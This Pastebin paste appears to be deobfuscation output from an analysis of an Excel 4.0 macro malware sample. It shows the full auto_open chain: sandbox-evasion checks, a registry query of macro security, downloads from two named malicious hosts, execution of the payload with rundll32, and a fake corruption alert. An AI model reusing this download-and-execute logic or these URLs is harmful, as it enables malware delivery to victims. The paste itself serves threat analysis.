Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Deobfuscated by: https://github.com/DissectMalware/XLMMacroDeobfuscator
- sample: hhttps://app.any.run/tasks/1a656e9a-0f6b-4a37-a9a2-4ead15ec7a89/
- ref: https://twitter.com/James_inthe_box/status/1263142837933051904
- [Loading Cells]
- auto_open: auto_open->Sheet2!$EZ$16757
- [Starting Deobfuscation]
- CELL:EZ16757 , FullEvaluation ,SET.VALUE(Sheet2!DX23839,"-350")
- CELL:EZ16758 , FullEvaluation ,GOTO(DS11877)
- CELL:DS11877 , FullEvaluation ,SET.VALUE(Sheet2!IM32690,"428")
- CELL:DS11878 , FullEvaluation ,GOTO(EL33549)
- CELL:EL33549 , FullEvaluation ,SET.VALUE(Sheet2!AD4689,"-464")
- CELL:EL33550 , FullEvaluation ,RUN(Sheet2!GZ2517)
- CELL:GZ2517 , FullEvaluation ,SET.VALUE(Sheet2!FC50404,"337")
- CELL:GZ2518 , FullEvaluation ,GOTO(W23611)
- CELL:W23611 , FullEvaluation ,SET.VALUE(Sheet2!DN10383,"607.6")
- CELL:W23612 , FullEvaluation ,RUN(Sheet2!EK22601)
- CELL:EK22601 , FullEvaluation ,SET.VALUE(Sheet2!HM37381,"-302")
- CELL:EK22602 , FullEvaluation ,GOTO(AR7263)
- CELL:AR7263 , FullEvaluation ,SET.VALUE(Sheet2!R5879,"-537.9")
- CELL:AR7264 , FullEvaluation ,GOTO(DG33187)
- CELL:DG33187 , FullEvaluation ,SET.VALUE(Sheet2!IH47316,"-294")
- CELL:DG33188 , FullEvaluation ,RUN(Sheet2!DV6231)
- CELL:DV6231 , FullEvaluation ,SET.VALUE(Sheet2!DM40865,"502")
- CELL:DV6232 , FullEvaluation ,RUN(Sheet2!IR65325)
- CELL:IR65325 , FullEvaluation ,SET.VALUE(Sheet2!DD28646,"308")
- CELL:IR65326 , FullEvaluation ,RUN(Sheet2!AN52075)
- CELL:AN52075 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!AU28892)
- CELL:AN52076 , FullEvaluation ,RUN(Sheet2!CD27825)
- CELL:CD27825 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!CD27826)
- CELL:CD27826 , NotImplemented ,APP.MAXIMIZE()
- CELL:CD27827 , FullEvaluation ,RUN(Sheet2!BE21756)
- CELL:BE21756 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[7135]C[-10]),)",Sheet2!BE21757)
- CELL:BE21757 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[7135]C[-10]),)
- CELL:BE21758 , FullEvaluation , RUN(Sheet2!CJ51431)
- CELL:CJ51431 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-22540]C[-41]))",Sheet2!CJ51432)
- CELL:CJ51432 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-22540]C[-41]))
- CELL:CJ51433 , FullEvaluation , RUN(Sheet2!EK53289)
- CELL:EK53289 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-24398]C[-94]),)",Sheet2!EK53290)
- CELL:EK53290 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-24398]C[-94]),)
- CELL:EK53291 , FullEvaluation , RUN(Sheet2!DE53091)
- CELL:DE53091 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[-24200]C[-62]),)",Sheet2!DE53092)
- CELL:DE53092 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-24200]C[-62]),)
- CELL:DE53093 , FullEvaluation , GOTO(BD7678)
- CELL:BD7678 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[21213]C[-9]),)",Sheet2!BD7679)
- CELL:BD7679 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[21213]C[-9]),)
- CELL:BD7679 , FullEvaluation , [TRUE] GOTO(R[21213]C[-9])
- CELL:AU28892 , End , CLOSE(FALSE)
- CELL:BD7679 , FullEvaluation , [FALSE]
- CELL:BD7680 , FullEvaluation , RUN(Sheet2!T27711)
- CELL:T27711 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[1180]C[27]),)",Sheet2!T27712)
- CELL:T27712 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[1180]C[27]),)
- CELL:T27712 , FullEvaluation , [TRUE] GOTO(R[1180]C[27])
- CELL:AU28892 , End , CLOSE(FALSE)
- CELL:T27712 , FullEvaluation , [FALSE]
- CELL:T27713 , FullEvaluation , RUN(Sheet2!DQ22708)
- CELL:DQ22708 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[6183]C[-74]))",Sheet2!DQ22709)
- CELL:DQ22709 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[6183]C[-74]))
- CELL:DQ22710 , FullEvaluation , RUN(Sheet2!GE18364)
- CELL:GE18364 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[10527]C[-140]))",Sheet2!GE18365)
- CELL:GE18365 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[10527]C[-140]))
- CELL:GE18366 , FullEvaluation , GOTO(GC2028)
- CELL:GC2028 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[26863]C[-138]))",Sheet2!GC2029)
- CELL:GC2029 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[26863]C[-138]))
- CELL:GC2030 , FullEvaluation , RUN(Sheet2!CE49383)
- CELL:CE49383 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!AD52416)
- CELL:CE49384 , FullEvaluation , GOTO(FY17312)
- CELL:FY17312 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\F31yq.reg""",Sheet2!FC42899)
- CELL:FY17313 , FullEvaluation , GOTO(O52519)
- CELL:O52519 , FullEvaluation , FORMULA.FILL("=R[7387]C[-141]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-2130]C[-12]&"" /y""",Sheet2!FO45029)
- CELL:O52520 , FullEvaluation , GOTO(I2849)
- CELL:I2849 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!A56)
- CELL:I2850 , FullEvaluation , RUN(Sheet2!AB43815)
- CELL:AB43815 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43760]C[-27],R[1213]C[143],0,5)",Sheet2!AB43816)
- CELL:AB43816 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",51203GET.WORKSPACE(2)\Excel\Security P41686 /y,0,5)
- CELL:AB43817 , FullEvaluation , RUN(Sheet2!GZ65252)
- CELL:GZ65252 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[-22356]C[-49])))",Sheet2!GZ65255)
- CELL:GZ65253 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!GZ65256)
- CELL:GZ65254 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!GZ65257)
- CELL:GZ65255 , PartialEvaluation , WHILE("C:\Users\Public\F31yq.reg")
- CELL:GZ65256 , PartialEvaluation , WAIT(NOW()+"00:00:01")
- CELL:GZ65257 , PartialEvaluation , NEXT()
- CELL:GZ65258 , FullEvaluation , RUN(Sheet2!S45310)
- CELL:S45310 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-2412]C[140])",Sheet2!S45311)
- CELL:S45311 , PartialEvaluation , FOPEN("C:\Users\Public\F31yq.reg")
- CELL:S45312 , FullEvaluation , RUN(Sheet2!DG13084)
- CELL:DG13084 , FullEvaluation , FORMULA.FILL("=FPOS(R[32226]C[-92],215)",Sheet2!DG13085)
- CELL:DG13085 , PartialEvaluation , FPOS("""C:\Users\Public\F31yq.reg""",215)
- CELL:DG13086 , FullEvaluation , RUN(Sheet2!AM24582)
- CELL:AM24582 , FullEvaluation , FORMULA.FILL("=FREAD(R[20728]C[-20],255)",Sheet2!AM24583)
- CELL:AM24583 , PartialEvaluation , FREAD("""C:\Users\Public\F31yq.reg""",255)
- CELL:AM24584 , FullEvaluation , RUN(Sheet2!EZ32599)
- CELL:EZ32599 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[12711]C[-137])",Sheet2!EZ32600)
- CELL:EZ32600 , PartialEvaluation , FCLOSE("""C:\Users\Public\F31yq.reg""")
- CELL:EZ32601 , FullEvaluation , RUN(Sheet2!IS8766)
- CELL:IS8766 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[34132]C[-94])",Sheet2!IS8767)
- CELL:IS8767 , NotImplemented , FILE.DELETE(R[34132]C[-94])
- CELL:IS8768 , FullEvaluation , GOTO(Y20249)
- CELL:Y20249 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[4333]C[14])),GOTO(R[8642]C[22]),)",Sheet2!Y20250)
- CELL:Y20250 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[4333]C[14])),GOTO(R[8642]C[22]),)
- CELL:Y20251 , FullEvaluation , GOTO(DW46971)
- CELL:DW46971 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\278C.html""",Sheet2!EF25999)
- CELL:DW46972 , FullEvaluation , GOTO(AQ10543)
- CELL:AQ10543 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!BI8351)
- CELL:AQ10544 , FullEvaluation , RUN(Sheet2!DA40956)
- CELL:DA40956 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-32606]C[-44],R[-14958]C[31],0,0)",Sheet2!DA40957)
- CELL:DA40957 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\278C.html",0,0)
- CELL:DA40958 , FullEvaluation , RUN(Sheet2!AB30737)
- CELL:AB30737 , FullEvaluation , FORMULA.FILL("=FILES(R[-4739]C[108])",Sheet2!AB30738)
- CELL:AB30738 , PartialEvaluation , FILES("C:\Users\Public\278C.html")
- CELL:AB30739 , FullEvaluation , GOTO(DH602)
- CELL:DH602 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[30135]C[-84]),GOTO(R[28289]C[-65]),)",Sheet2!DH603)
- CELL:DH603 , FullBranching , IF(ISERROR(R[30135]C[-84]),GOTO(R[28289]C[-65]),)
- CELL:DH603 , FullEvaluation , [TRUE] GOTO(R[28289]C[-65])
- CELL:AU28892 , End , CLOSE(FALSE)
- CELL:DH603 , FullEvaluation , [FALSE]
- CELL:DH604 , FullEvaluation , RUN(Sheet2!DP56466)
- CELL:DP56466 , FullEvaluation , SET.VALUE(Sheet2!IT55124,"-1227.5")
- CELL:DP56467 , FullEvaluation , GOTO(FZ46015)
- CELL:FZ46015 , FullEvaluation , SET.VALUE(Sheet2!BK30990,"219")
- CELL:FZ46016 , FullEvaluation , RUN(Sheet2!CZ42664)
- CELL:CZ42664 , FullEvaluation , SET.VALUE(Sheet2!HU62740,"-179")
- CELL:CZ42665 , FullEvaluation , GOTO(Z43104)
- CELL:Z43104 , FullEvaluation , SET.VALUE(Sheet2!AQ37789,"-231")
- CELL:Z43105 , FullEvaluation , GOTO(AB63111)
- CELL:AB63111 , FullEvaluation , SET.VALUE(Sheet2!AM30833,"-167")
- CELL:AB63112 , FullEvaluation , GOTO(HT6285)
- CELL:HT6285 , FullEvaluation , SET.VALUE(Sheet2!AB59905,"97.4")
- CELL:HT6286 , FullEvaluation , RUN(Sheet2!AL38908)
- CELL:AL38908 , FullEvaluation , SET.VALUE(Sheet2!EC58448,"-6.75")
- CELL:AL38909 , FullEvaluation , RUN(Sheet2!HE24233)
- CELL:HE24233 , FullEvaluation , SET.VALUE(Sheet2!ET17871,"426")
- CELL:HE24234 , FullEvaluation , GOTO(CM31379)
- CELL:CM31379 , FullEvaluation , SET.VALUE(Sheet2!AV38726,"-330")
- CELL:CM31380 , FullEvaluation , RUN(Sheet2!DP40784)
- CELL:DP40784 , FullEvaluation , SET.VALUE(Sheet2!IQ39844,"176")
- CELL:DP40785 , FullEvaluation , GOTO(GZ65311)
- CELL:GZ65311 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\vpySLQ4.html""",Sheet2!FA20689)
- CELL:GZ65312 , FullEvaluation , GOTO(V55549)
- CELL:V55549 , FullEvaluation , FORMULA.FILL("=""http://linguy.cn/wp-content/plugins/apikey/wp-front.php""",Sheet2!EH27066)
- CELL:V55550 , FullEvaluation , RUN(Sheet2!EJ44674)
- CELL:EJ44674 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-34611]C[-3],R[-40988]C[16],0,0)",Sheet2!EK61677)
- CELL:EJ44675 , FullEvaluation , GOTO(EE53119)
- CELL:EE53119 , FullEvaluation , FORMULA.FILL("=FILES(R[-9924]C[-91])",Sheet2!IN30613)
- CELL:EE53120 , FullEvaluation , RUN(Sheet2!CX11460)
- CELL:CX11460 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[25175]C[173]),,RUN(R[3160]C[32]))",Sheet2!BW5438)
- CELL:CX11461 , FullEvaluation , GOTO(BD32544)
- CELL:BD32544 , FullEvaluation , FORMULA.FILL("=""https://esvconnects.com/wp-content/plugins/apikey/wp-front.php""",Sheet2!FK56594)
- CELL:BD32545 , FullEvaluation , GOTO(ID25477)
- CELL:ID25477 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[52036]C[156],R[16131]C[146],0,0)",Sheet2!K4558)
- CELL:ID25478 , FullEvaluation , RUN(Sheet2!S36752)
- CELL:S36752 , FullEvaluation , FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!AX33696)
- CELL:S36753 , FullEvaluation , GOTO(FS35376)
- CELL:FS35376 , FullEvaluation , FORMULA.FILL("=ALERT(R[25098]C[-57])",Sheet2!DC8598)
- CELL:FS35377 , FullEvaluation , RUN(Sheet2!FI43724)
- CELL:FI43724 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Sheet2!HB36462)
- CELL:FI43725 , FullEvaluation , RUN(Sheet2!DF63884)
- CELL:DF63884 , FullEvaluation , FORMULA.FILL("=R[5628]C[-60]&"",DllRegisterServer""",Sheet2!HI15061)
- CELL:DF63885 , FullEvaluation , RUN(Sheet2!AS18031)
- CELL:AS18031 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-11962]C[6],R[-33363]C[13],0,5)",Sheet2!GV48424)
- CELL:AS18032 , FullEvaluation , RUN(Sheet2!EK61677)
- CELL:EK61677 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://linguy.cn/wp-content/plugins/apikey/wp-front.php","C:\Users\Public\vpySLQ4.html",0,0)
- CELL:EK61678 , FullEvaluation , RUN(Sheet2!IN30613)
- CELL:IN30613 , PartialEvaluation , FILES("C:\Users\Public\vpySLQ4.html")
- CELL:IN30614 , FullEvaluation , GOTO(BW5438)
- CELL:BW5438 , FullBranching , IF(ISERROR(R[25175]C[173]),,RUN(R[3160]C[32]))
- CELL:BW5438 , FullEvaluation , [TRUE]
- CELL:BW5439 , FullEvaluation , RUN(Sheet2!FK56594)
- CELL:FK56594 , FullEvaluation , "https://esvconnects.com/wp-content/plugins/apikey/wp-front.php"
- CELL:FK56595 , FullEvaluation , GOTO(K4558)
- CELL:K4558 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://esvconnects.com/wp-content/plugins/apikey/wp-front.php""","C:\Users\Public\vpySLQ4.html",0,0)
- CELL:K4559 , FullEvaluation , GOTO(AX33696)
- CELL:AX33696 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:AX33697 , FullEvaluation , RUN(Sheet2!DC8598)
- CELL:DC8598 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
- CELL:DC8599 , FullEvaluation , RUN(Sheet2!HB36462)
- CELL:HB36462 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:HB36463 , FullEvaluation , GOTO(HI15061)
- CELL:HI15061 , FullEvaluation , C:\Users\Public\vpySLQ4.html,DllRegisterServer
- CELL:HI15062 , FullEvaluation , RUN(Sheet2!GV48424)
- CELL:GV48424 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\vpySLQ4.html,DllRegisterServer",0,5)
- CELL:GV48425 , FullEvaluation , GOTO(AU28892)
- CELL:AU28892 , End , CLOSE(FALSE)
- CELL:BW5438 , FullEvaluation , [FALSE] RUN(Sheet2!DC8598)
- CELL:DC8598 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:DC8599 , FullEvaluation , RUN(Sheet2!HB36462)
- CELL:HB36462 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:HB36463 , FullEvaluation , GOTO(HI15061)
- CELL:HI15061 , FullEvaluation , C:\Users\Public\vpySLQ4.html,DllRegisterServer
- CELL:HI15062 , FullEvaluation , RUN(Sheet2!GV48424)
- CELL:GV48424 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\vpySLQ4.html,DllRegisterServer",0,5)
- CELL:GV48425 , FullEvaluation , GOTO(AU28892)
- CELL:AU28892 , End , CLOSE(FALSE)
- time elapsed: 6.313699722290039
Add Comment
Please, Sign In to add comment